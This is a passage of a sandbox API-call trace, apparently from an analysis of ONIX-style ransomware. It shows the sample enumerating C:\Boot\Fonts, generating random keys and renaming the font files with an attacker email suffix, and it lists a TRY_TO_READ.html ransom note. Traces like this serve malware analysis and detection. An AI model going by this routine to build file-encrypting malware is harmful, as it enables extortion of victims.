(in: param_1=0x530000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\\\Boot\\Fonts9c354ca09c354b444c.lock") returned 37 [0065.419] CreateFileW (lpFileName="C:\\\\Boot\\Fonts9c354ca09c354b444c.lock" (normalized: "c:\\boot\\fonts9c354ca09c354b444c.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3cc [0065.419] VirtualFree (lpAddress=0x540000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.420] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.420] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470c28 [0065.420] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470bf0 | out: hHeap=0x410000) returned 1 [0065.420] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47cce8 | out: hHeap=0x410000) returned 1 [0065.420] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47cd10 | out: hHeap=0x410000) returned 1 [0065.420] FindFirstFileW (in: lpFileName="C:\\\\Boot\\Fonts\\*", lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x30948810, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30948810, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x48e330 [0065.420] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.420] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.420] GetLastError () returned 0x0 [0065.420] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470bf0 [0065.420] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x4c) returned 0x45b320 [0065.420] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45b320 | out: hHeap=0x410000) returned 1 [0065.420] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47cce8 [0065.420] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x34) returned 0x48e370 [0065.420] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48e370 | out: hHeap=0x410000) returned 1 [0065.420] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x46a8b8 [0065.420] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46a8b8 | out: hHeap=0x410000) returned 1 [0065.420] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47cce8 | out: hHeap=0x410000) returned 1 [0065.420] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470bf0 | out: hHeap=0x410000) returned 1 [0065.420] FindNextFileW (in: hFindFile=0x48e330, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x30948810, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30948810, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.420] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.420] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.420] GetLastError () returned 0x0 [0065.420] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470bf0 [0065.421] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x4c) returned 0x45b320 [0065.421] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45b320 | out: hHeap=0x410000) returned 1 [0065.421] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47cce8 [0065.421] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x34) returned 0x48e370 [0065.421] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48e370 | out: hHeap=0x410000) returned 1 [0065.421] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x46a8b8 [0065.421] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46a8b8 | out: hHeap=0x410000) returned 1 [0065.421] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47cce8 | out: hHeap=0x410000) returned 1 [0065.421] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470bf0 | out: hHeap=0x410000) returned 1 [0065.421] FindNextFileW (in: hFindFile=0x48e330, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x64c5ad69, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x385e00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="chs_boot.ttf", cAlternateFileName="")) returned 1 [0065.421] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.421] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.421] GetLastError () returned 0x0 [0065.421] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47cce8 [0065.421] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470bf0 [0065.421] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541a8 [0065.421] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541a8 | out: hHeap=0x410000) returned 1 [0065.421] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470bf0 | out: hHeap=0x410000) returned 1 [0065.421] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47cce8 | out: hHeap=0x410000) returned 1 [0065.421] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541a8 [0065.421] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x100) returned 0x48c540 [0065.421] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x466638 [0065.421] CreateFileW (lpFileName="C:\\\\Boot\\Fonts\\chs_boot.ttf" (normalized: "c:\\boot\\fonts\\chs_boot.ttf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0xffffffff [0065.421] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0065.421] CreateFileW (lpFileName="C:\\\\Boot\\Fonts\\chs_boot.ttf" (normalized: "c:\\boot\\fonts\\chs_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0xffffffff [0065.422] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.422] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48c540 | out: pbBuffer=0x48c540) returned 1 [0065.422] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x466638 | out: pbBuffer=0x466638) returned 1 [0065.422] SetFileAttributesW (lpFileName="C:\\\\Boot\\Fonts\\chs_boot.ttf", dwFileAttributes=0x80) returned 0 [0065.422] lstrlenW (lpString="C:\\\\Boot\\Fonts\\chs_boot.ttf") returned 27 [0065.422] GetProcessHeap () returned 0x410000 [0065.422] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xa6) returned 0x43e3f8 [0065.422] lstrcpyW (in: lpString1=0x43e3f8, lpString2="C:\\\\Boot\\Fonts\\chs_boot.ttf" | out: lpString1="C:\\\\Boot\\Fonts\\chs_boot.ttf") returned="C:\\\\Boot\\Fonts\\chs_boot.ttf" [0065.422] lstrcatW (in: lpString1="C:\\\\Boot\\Fonts\\chs_boot.ttf", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Boot\\Fonts\\chs_boot.ttf.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Boot\\Fonts\\chs_boot.ttf.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0065.422] GetProcessHeap () returned 0x410000 [0065.422] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0065.422] CloseHandle (hObject=0xffffffff) returned 0 [0065.422] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541a8 | out: hHeap=0x410000) returned 1 [0065.422] FindNextFileW (in: hFindFile=0x48e330, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac191e00, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac191e00, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x6505f253, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x3b27a4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cht_boot.ttf", cAlternateFileName="")) returned 1 [0065.422] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.422] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.422] GetLastError () returned 0x6 [0065.422] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47cce8 [0065.422] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470bf0 [0065.422] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541a8 [0065.422] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541a8 | out: hHeap=0x410000) returned 1 [0065.422] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470bf0 | out: hHeap=0x410000) returned 1 [0065.422] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47cce8 | out: hHeap=0x410000) returned 1 [0065.422] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541a8 [0065.422] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x100) returned 0x48c648 [0065.422] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x466648 [0065.422] CreateFileW (lpFileName="C:\\\\Boot\\Fonts\\cht_boot.ttf" (normalized: "c:\\boot\\fonts\\cht_boot.ttf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0xffffffff [0065.424] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0065.424] CreateFileW (lpFileName="C:\\\\Boot\\Fonts\\cht_boot.ttf" (normalized: "c:\\boot\\fonts\\cht_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0xffffffff [0065.424] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.424] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48c648 | out: pbBuffer=0x48c648) returned 1 [0065.424] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x466648 | out: pbBuffer=0x466648) returned 1 [0065.424] SetFileAttributesW (lpFileName="C:\\\\Boot\\Fonts\\cht_boot.ttf", dwFileAttributes=0x80) returned 0 [0065.424] lstrlenW (lpString="C:\\\\Boot\\Fonts\\cht_boot.ttf") returned 27 [0065.424] GetProcessHeap () returned 0x410000 [0065.424] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xa6) returned 0x43e3f8 [0065.424] lstrcpyW (in: lpString1=0x43e3f8, lpString2="C:\\\\Boot\\Fonts\\cht_boot.ttf" | out: lpString1="C:\\\\Boot\\Fonts\\cht_boot.ttf") returned="C:\\\\Boot\\Fonts\\cht_boot.ttf" [0065.424] lstrcatW (in: lpString1="C:\\\\Boot\\Fonts\\cht_boot.ttf", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Boot\\Fonts\\cht_boot.ttf.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Boot\\Fonts\\cht_boot.ttf.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0065.424] GetProcessHeap () returned 0x410000 [0065.424] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0065.424] CloseHandle (hObject=0xffffffff) returned 0 [0065.424] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541a8 | out: hHeap=0x410000) returned 1 [0065.424] FindNextFileW (in: hFindFile=0x48e330, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac204220, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac204220, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65274577, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x1e46e4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jpn_boot.ttf", cAlternateFileName="")) returned 1 [0065.424] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.424] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.424] GetLastError () returned 0x6 [0065.425] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47cce8 [0065.425] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470bf0 [0065.425] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541a8 [0065.425] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541a8 | out: hHeap=0x410000) returned 1 [0065.425] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470bf0 | out: hHeap=0x410000) returned 1 [0065.425] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47cce8 | out: hHeap=0x410000) returned 1 [0065.425] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541a8 [0065.425] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x100) returned 0x48c750 [0065.425] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x466658 [0065.425] CreateFileW (lpFileName="C:\\\\Boot\\Fonts\\jpn_boot.ttf" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0xffffffff [0065.425] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0065.425] CreateFileW (lpFileName="C:\\\\Boot\\Fonts\\jpn_boot.ttf" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0xffffffff [0065.425] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.425] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48c750 | out: pbBuffer=0x48c750) returned 1 [0065.425] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x466658 | out: pbBuffer=0x466658) returned 1 [0065.425] SetFileAttributesW (lpFileName="C:\\\\Boot\\Fonts\\jpn_boot.ttf", dwFileAttributes=0x80) returned 0 [0065.425] lstrlenW (lpString="C:\\\\Boot\\Fonts\\jpn_boot.ttf") returned 27 [0065.426] GetProcessHeap () returned 0x410000 [0065.426] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xa6) returned 0x43e3f8 [0065.426] lstrcpyW (in: lpString1=0x43e3f8, lpString2="C:\\\\Boot\\Fonts\\jpn_boot.ttf" | out: lpString1="C:\\\\Boot\\Fonts\\jpn_boot.ttf") returned="C:\\\\Boot\\Fonts\\jpn_boot.ttf" [0065.426] lstrcatW (in: lpString1="C:\\\\Boot\\Fonts\\jpn_boot.ttf", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Boot\\Fonts\\jpn_boot.ttf.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Boot\\Fonts\\jpn_boot.ttf.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0065.426] GetProcessHeap () returned 0x410000 [0065.426] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0065.426] CloseHandle (hObject=0xffffffff) returned 0 [0065.426] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541a8 | out: hHeap=0x410000) returned 1 [0065.426] FindNextFileW (in: hFindFile=0x48e330, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac22a380, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac22a380, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x6530caef, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x242f20, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="kor_boot.ttf", cAlternateFileName="")) returned 1 [0065.426] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.426] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.426] GetLastError () returned 0x6 [0065.426] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47cce8 [0065.426] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470bf0 [0065.426] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541a8 [0065.426] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541a8 | out: hHeap=0x410000) returned 1 [0065.426] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470bf0 | out: hHeap=0x410000) returned 1 [0065.426] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47cce8 | out: hHeap=0x410000) returned 1 [0065.426] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541a8 [0065.426] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x100) returned 0x48c858 [0065.426] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x466668 [0065.426] CreateFileW (lpFileName="C:\\\\Boot\\Fonts\\kor_boot.ttf" (normalized: "c:\\boot\\fonts\\kor_boot.ttf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0xffffffff [0065.426] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0065.426] CreateFileW (lpFileName="C:\\\\Boot\\Fonts\\kor_boot.ttf" (normalized: "c:\\boot\\fonts\\kor_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0xffffffff [0065.426] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.427] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48c858 | out: pbBuffer=0x48c858) returned 1 [0065.427] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x466668 | out: pbBuffer=0x466668) returned 1 [0065.427] SetFileAttributesW (lpFileName="C:\\\\Boot\\Fonts\\kor_boot.ttf", dwFileAttributes=0x80) returned 0 [0065.427] lstrlenW (lpString="C:\\\\Boot\\Fonts\\kor_boot.ttf") returned 27 [0065.427] GetProcessHeap () returned 0x410000 [0065.427] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xa6) returned 0x43e3f8 [0065.427] lstrcpyW (in: lpString1=0x43e3f8, lpString2="C:\\\\Boot\\Fonts\\kor_boot.ttf" | out: lpString1="C:\\\\Boot\\Fonts\\kor_boot.ttf") returned="C:\\\\Boot\\Fonts\\kor_boot.ttf" [0065.427] lstrcatW (in: lpString1="C:\\\\Boot\\Fonts\\kor_boot.ttf", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Boot\\Fonts\\kor_boot.ttf.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Boot\\Fonts\\kor_boot.ttf.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0065.427] GetProcessHeap () returned 0x410000 [0065.427] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0065.427] CloseHandle (hObject=0xffffffff) returned 0 [0065.427] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541a8 | out: hHeap=0x410000) returned 1 [0065.427] FindNextFileW (in: hFindFile=0x48e330, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x30948810, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x30948810, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30948810, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0065.427] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.427] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.427] GetLastError () returned 0x6 [0065.427] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470bf0 [0065.427] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470c60 [0065.427] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541a8 [0065.427] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541a8 | out: hHeap=0x410000) returned 1 [0065.427] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470c60 | out: hHeap=0x410000) returned 1 [0065.427] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470bf0 | out: hHeap=0x410000) returned 1 [0065.427] FindNextFileW (in: hFindFile=0x48e330, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac276640, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65332c4d, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xb95c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wgl4_boot.ttf", cAlternateFileName="WGL4_B~1.TTF")) returned 1 [0065.427] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.427] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.427] GetLastError () returned 0x6 [0065.427] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47cce8 [0065.427] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470bf0 [0065.427] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541a8 [0065.427] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541a8 | out: hHeap=0x410000) returned 1 [0065.427] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470bf0 | out: hHeap=0x410000) returned 1 [0065.427] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47cce8 | out: hHeap=0x410000) returned 1 [0065.427] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541a8 [0065.428] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x100) returned 0x48c960 [0065.428] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x466678 [0065.428] CreateFileW (lpFileName="C:\\\\Boot\\Fonts\\wgl4_boot.ttf" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0xffffffff [0065.428] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0065.428] CreateFileW (lpFileName="C:\\\\Boot\\Fonts\\wgl4_boot.ttf" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0xffffffff [0065.428] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.428] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48c960 | out: pbBuffer=0x48c960) returned 1 [0065.428] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x466678 | out: pbBuffer=0x466678) returned 1 [0065.428] SetFileAttributesW (lpFileName="C:\\\\Boot\\Fonts\\wgl4_boot.ttf", dwFileAttributes=0x80) returned 0 [0065.428] lstrlenW (lpString="C:\\\\Boot\\Fonts\\wgl4_boot.ttf") returned 28 [0065.428] GetProcessHeap () returned 0x410000 [0065.428] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xa8) returned 0x43e3f8 [0065.428] lstrcpyW (in: lpString1=0x43e3f8, lpString2="C:\\\\Boot\\Fonts\\wgl4_boot.ttf" | out: lpString1="C:\\\\Boot\\Fonts\\wgl4_boot.ttf") returned="C:\\\\Boot\\Fonts\\wgl4_boot.ttf" [0065.428] lstrcatW (in: lpString1="C:\\\\Boot\\Fonts\\wgl4_boot.ttf", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Boot\\Fonts\\wgl4_boot.ttf.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Boot\\Fonts\\wgl4_boot.ttf.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0065.428] GetProcessHeap () returned 0x410000 [0065.428] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0065.428] CloseHandle (hObject=0xffffffff) returned 0 [0065.428] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541a8 | out: hHeap=0x410000) returned 1 [0065.429] FindNextFileW (in: hFindFile=0x48e330, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac276640, ftCreationTime.dwHighDateTime=0x1d2de32, 